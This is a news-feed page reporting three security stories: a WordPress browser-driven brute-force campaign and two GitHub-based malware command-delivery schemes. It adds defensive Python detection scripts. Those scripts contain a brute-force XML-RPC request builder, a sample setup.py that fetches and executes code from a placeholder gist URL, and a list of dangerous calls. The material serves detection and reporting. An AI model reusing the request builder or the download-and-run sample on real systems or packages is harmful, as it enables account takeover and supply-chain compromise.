Abusing – INDIA NEWS https://www.indiavpn.org

Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force Attacks
https://www.indiavpn.org/2024/03/07/hacked-wordpress-sites-abusing-visitors-browsers-for-distributed-brute-force-attacks/
Thu, 07 Mar 2024 14:55:09 +0000

Mar 07, 2024 | Newsroom | Vulnerability / Web Security


Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.

The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.

The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.

The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don’t load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.


The attack unfolds in five stages, letting the threat actor use already compromised websites to launch distributed brute-force attacks against other potential victims:

  • Obtaining a list of target WordPress sites
  • Extracting the real usernames of authors who post on those domains
  • Injecting the malicious JavaScript code into already infected WordPress sites
  • Launching a distributed brute-force attack on the target sites from visitors' browsers when they land on the hacked sites
  • Gaining unauthorized access to the target sites

“For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request,” Sinegubko explained. “If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.”
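The following detection script is an added example and is not code from Sucuri's report or from the injected script itself. It builds the `wp.uploadFile` XML-RPC call exactly as the attack stages above describe (one upload per candidate password, the credentials as the file body), then runs a detector over constructed request records of the kind a reverse proxy or WAF that logs POST bodies would produce. The signature it looks for is the one that distinguishes this campaign from an ordinary single-source brute force: many unrelated visitor IPs, each trying a different password against the same author account, all carrying a browser `Origin` header that names the hacked site. Host names, IPs, the `editor` username and the password list are made up; the `Origin` check is a heuristic, not something the report states.

```python
"""Detection for the visitor-browser XML-RPC brute force described above.

Constructed input only: WordPress XML-RPC request records of the kind a
reverse proxy or WAF that logs POST bodies would produce (plain access logs
do not carry the body). Hostnames, IPs, usernames and passwords are made up.
"""
import base64
from collections import defaultdict
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

# WordPress XML-RPC methods that carry credentials, with the 0-based
# positions of username and password in their parameter lists.
CREDENTIALED_METHODS = {
    "wp.uploadFile": (1, 2),      # blog_id, username, password, data
    "wp.getUsersBlogs": (0, 1),   # username, password
}


def build_upload_file_call(username, password, filename, payload):
    """Build the wp.uploadFile methodCall the injected script makes a visitor
    send: one upload attempt per password, the credentials as the payload."""
    bits = base64.b64encode(payload).decode()
    return (
        "<methodCall><methodName>wp.uploadFile</methodName><params>"
        "<param><value><int>1</int></value></param>"
        f"<param><value><string>{escape(username)}</string></value></param>"
        f"<param><value><string>{escape(password)}</string></value></param>"
        "<param><value><struct>"
        f"<member><name>name</name><value><string>{escape(filename)}</string></value></member>"
        "<member><name>type</name><value><string>text/plain</string></value></member>"
        f"<member><name>bits</name><value><base64>{bits}</base64></value></member>"
        "<member><name>overwrite</name><value><boolean>1</boolean></value></member>"
        "</struct></value></param></params></methodCall>"
    )


def parse_credentials(body):
    """Return (method, username, password) for a credentialed call, else None."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    method = root.findtext("methodName", "")
    if method not in CREDENTIALED_METHODS:
        return None
    values = root.findall("./params/param/value")
    user_idx, pw_idx = CREDENTIALED_METHODS[method]
    if len(values) <= pw_idx:
        return None
    return method, values[user_idx].findtext("string", ""), values[pw_idx].findtext("string", "")


def detect_distributed_bruteforce(records, min_sources=3, min_passwords=5):
    """Flag (host, username) pairs hit by many source IPs with many distinct
    passwords. A browser-driven attack also carries an Origin header naming
    the hacked site, which a native XML-RPC client typically does not send;
    it is reported as corroborating context (heuristic, assumed here)."""
    stats = defaultdict(lambda: {"ips": set(), "passwords": set(), "origins": set()})
    for rec in records:
        parsed = parse_credentials(rec["body"])
        if parsed is None:
            continue
        _, user, password = parsed
        entry = stats[(rec["host"], user)]
        entry["ips"].add(rec["src_ip"])
        entry["passwords"].add(password)
        if rec.get("origin"):
            entry["origins"].add(rec["origin"])
    findings = []
    for (host, user), entry in sorted(stats.items()):
        if len(entry["ips"]) >= min_sources and len(entry["passwords"]) >= min_passwords:
            findings.append({"host": host, "username": user,
                             "sources": len(entry["ips"]),
                             "passwords": len(entry["passwords"]),
                             "browser_origins": sorted(entry["origins"])})
    return findings


def constructed_records():
    """Six 'visitors' of a hacked site each try one common password against
    the same author account on the target, plus one legitimate upload and
    one unrelated call. All values are constructed for this example."""
    common = ["123456", "password", "admin123", "qwerty", "letmein", "welcome1"]
    records = []
    for i, pw in enumerate(common, start=1):
        records.append({"src_ip": f"203.0.113.{i}", "host": "victim.example",
                        "origin": "https://hacked-site.example",
                        "body": build_upload_file_call("editor", pw, "c.txt", f"editor:{pw}".encode())})
    records.append({"src_ip": "198.51.100.7", "host": "victim.example", "origin": None,
                    "body": build_upload_file_call("editor", "correct-horse", "notes.txt", b"hello")})
    records.append({"src_ip": "198.51.100.8", "host": "victim.example", "origin": None,
                    "body": "<methodCall><methodName>system.listMethods</methodName><params/></methodCall>"})
    return records


if __name__ == "__main__":
    for finding in detect_distributed_bruteforce(constructed_records()):
        print(finding)
```

Thresholds are deliberately low for the sample; on real traffic, tune `min_sources` and `min_passwords` to your baseline, and treat a `browser_origins` list that names a third-party site as the strongest single indicator, since legitimate XML-RPC clients have no reason to carry a foreign `Origin`.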

It's currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attacks, although the change may have been driven by profit motives, as compromised WordPress sites can be monetized in various ways.

That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet’s EIP-712 encoding procedure to bypass security alerts.


The development comes as the DFIR report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.

It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.

“Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack,” security researcher Ben Martin said.

Threat Actors Increasingly Abusing GitHub for Malicious Purposes
https://www.indiavpn.org/2024/01/11/threat-actors-increasingly-abusing-github-for-malicious-purposes/
Thu, 11 Jan 2024 16:48:40 +0000

Jan 11, 2024 | Newsroom | Cybersecurity / Software Security


The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers, command-and-control, and data exfiltration points.

“Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security defenses and making upstream infrastructure tracking and actor attribution more difficult,” Recorded Future said in a report shared with The Hacker News.

The cybersecurity firm described the approach as “living-off-trusted-sites” (LOTS), a spin on the living-off-the-land (LotL) techniques often adopted by threat actors to conceal rogue activity and fly under the radar.

Prominent among the methods by which GitHub is abused relates to payload delivery, with some actors leveraging its features for command-and-control (C2) obfuscation. Last month, ReversingLabs detailed a number of rogue Python packages that relied on a secret gist hosted on GitHub to receive malicious commands on the compromised hosts.


While full-fledged C2 implementations in GitHub are uncommon in comparison to other infrastructure schemes, its use by threat actors as a dead drop resolver – wherein the information from an actor-controlled GitHub repository is used to obtain the actual C2 URL – is a lot more prevalent, as evidenced in the case of malware like Drokbk and ShellBox.

Also rarely observed is the abuse of GitHub for data exfiltration, which, per Recorded Future, is likely due to file size and storage limitations and concerns around discoverability.

Outside of these four main schemes, the platform’s offerings are put to use in various other ways in order to meet infrastructure-related purposes. For instance, GitHub Pages have been used as phishing hosts or traffic redirectors, with some campaigns utilizing a GitHub repository as a backup C2 channel.


The development speaks to the broader trend of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, and Discord being exploited by threat actors. This also includes other source code and version control platforms like GitLab, BitBucket, and Codeberg.

“There is no universal solution for GitHub abuse detection,” the company said. “A mix of detection strategies is needed, influenced by specific environments and factors such as the availability of logs, organizational structure, service usage patterns, and risk tolerance, among others.”

Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts
https://www.indiavpn.org/2023/12/24/hackers-abusing-github-to-evade-detection-and-control-compromised-hosts/
Sun, 24 Dec 2023 18:21:39 +0000

Dec 19, 2023 | The Hacker News | Software Security / Threat Intelligence


Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages.

“Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools,” ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.

“But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware.”

Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address.


While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that’s both inexpensive and reliable.

The technique is stealthy because it lets threat actors blend their malicious traffic with genuine communications inside a compromised network, which makes detection and response harder. As a result, an infected endpoint communicating with a GitHub repository is less likely to be flagged as suspicious.

The abuse of GitHub gists points to an evolution of this trend. Gists, which are themselves Git repositories, offer an easy way for developers to share code snippets with others.

It’s worth noting at this stage that public gists show up in GitHub’s Discover feed, while secret gists, although not accessible via Discover, can be shared with others by sharing their URL.

“However, if someone you don’t know discovers the URL, they’ll also be able to see your gist,” GitHub notes in its documentation. “If you need to keep your code away from prying eyes, you may want to create a private repository instead.”

Another interesting aspect of secret gists is that they are not displayed on the author's GitHub profile page, enabling threat actors to use them as a pastebin-style service.

ReversingLabs said it identified several PyPI packages – namely, httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5 – that masqueraded as libraries for handling network proxying, but contained a Base64-encoded URL pointing to a secret gist hosted in a throwaway GitHub account without any public-facing projects.

The gist, for its part, features Base64-encoded commands that are parsed and executed in a new process through malicious code present in the setup.py file of the counterfeit packages.


The use of secret gists to deliver malicious commands to compromised hosts was previously highlighted by Trend Micro in 2019 as part of a campaign distributing a backdoor called SLUB (short for SLack and githUB).

A second technique observed by the software supply chain security firm entails the exploitation of version control system features, relying on git commit messages to extract commands for execution on the system.

The PyPI package, named easyhttprequest, incorporates malicious code that “clones a specific git repository from GitHub and checks if the ‘head’ commit of this repository contains a commit message that starts with a specific string,” Zanki said.

“If it does, it strips that magic string and decodes the rest of the Base64-encoded commit message, executing it as a Python command in a new process.” The GitHub repository that gets cloned is a fork of a seemingly legitimate PySocks project, and it does not have any malicious git commit messages.

All the fraudulent packages have now been taken down from the Python Package Index (PyPI) repository.

“Using GitHub as C2 infrastructure isn’t new on its own, but abuse of features like Git Gists and commit messages for command delivery are novel approaches used by malicious actors,” Zanki said.
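The static triage script below is an added example, not ReversingLabs' tooling or the malicious packages' own code. It covers the two command-delivery tricks described in this article, and the dead-drop-resolver pattern from the Recorded Future piece above, from the defender's side: a scanner that walks a `setup.py` AST looking for Base64 string literals that decode to gist or raw-content GitHub URLs next to process-spawning calls, and a function that mirrors the `easyhttprequest` check on a commit message (magic prefix, then a Base64 command) but returns the decoded command for logging instead of executing it. The sample `setup.py`, the gist path, the magic prefix `#!cmd:` and the commit messages are all constructed for this example; the real indicators are in the report, not here.

```python
"""Static triage for GitHub-based command delivery in PyPI packages.

Everything below works offline on constructed input. In practice you would
unpack the sdist first and scan setup.py and any module imported from it.
The gist path and magic prefix are assumptions for the example.
"""
import ast
import base64
import re

GITHUB_HOSTS = ("gist.github.com", "gist.githubusercontent.com",
                "raw.githubusercontent.com", "github.com")
DANGEROUS_CALLS = {"exec", "eval", "subprocess.Popen", "subprocess.run",
                   "subprocess.call", "subprocess.check_output",
                   "os.system", "os.popen"}
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _dotted_name(node):
    """Render ast.Name / ast.Attribute chains as 'a.b.c'; other nodes -> None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _try_b64(text):
    """Decode a plausible Base64 string literal to printable text, else None."""
    if not B64_LITERAL.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def scan_setup_py(source):
    """Return Base64-hidden GitHub URLs and process-spawning calls found in
    a setup.py. Either alone is weak; both together in an install script
    is the pattern of the counterfeit proxy packages."""
    tree = ast.parse(source)
    hidden_urls, exec_calls = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = _try_b64(node.value)
            if decoded and any(host in decoded for host in GITHUB_HOSTS):
                hidden_urls.append(decoded)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in DANGEROUS_CALLS:
                exec_calls.append(name)
    return {"hidden_urls": hidden_urls, "exec_calls": exec_calls}


def extract_commit_command(message, magic):
    """Mirror the easyhttprequest check on a HEAD commit message: if it starts
    with the magic string, the remainder is a Base64 command. Returns the
    decoded command (or None) so a triage tool can log rather than run it."""
    if not message.startswith(magic):
        return None
    try:
        return base64.b64decode(message[len(magic):].strip(),
                                validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample resembling the counterfeit proxy packages: the gist URL is
# hidden as Base64 and whatever it returns is spawned as a new Python process.
_HIDDEN_URL = "https://gist.githubusercontent.com/example-user/000/raw/cmd.txt"  # assumed
SAMPLE_SETUP_PY = f'''
import base64, subprocess, urllib.request
from setuptools import setup
_u = "{base64.b64encode(_HIDDEN_URL.encode()).decode()}"
_c = urllib.request.urlopen(base64.b64decode(_u).decode()).read()
subprocess.Popen(["python", "-c", base64.b64decode(_c).decode()])
setup(name="libproxy-example", version="0.0.1")
'''

MAGIC = "#!cmd:"  # assumed marker for this example
SAMPLE_COMMITS = [  # constructed commit messages, newest last
    "Update README",
    MAGIC + base64.b64encode(b"print('hello')").decode(),
]

if __name__ == "__main__":
    print(scan_setup_py(SAMPLE_SETUP_PY))
    print([extract_commit_command(m, MAGIC) for m in SAMPLE_COMMITS])
```

The same AST walk generalises to the dead-drop-resolver case: a package that fetches a GitHub-hosted file and then parses a second URL out of it will show the hidden first-stage URL here, and the network destination at runtime will be the real C2 rather than GitHub, which is why the URL-level finding matters more than the host name.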
